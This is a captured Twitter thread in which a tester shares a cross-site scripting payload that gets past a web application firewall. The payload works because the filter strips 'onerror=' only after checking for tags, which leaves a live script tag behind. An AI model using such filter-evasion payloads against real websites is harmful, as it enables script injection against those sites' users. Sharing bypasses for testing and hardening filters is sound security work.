WAF bypass of the day: <scronerror=ipt>prompt(document.domain)</scronerror=ipt>
-
-
The WAF I was testing removes the string "onerror=" *after* validating that there are no malicious tags, leaving <script> in the output.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
Replace to "onerror=" i think.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.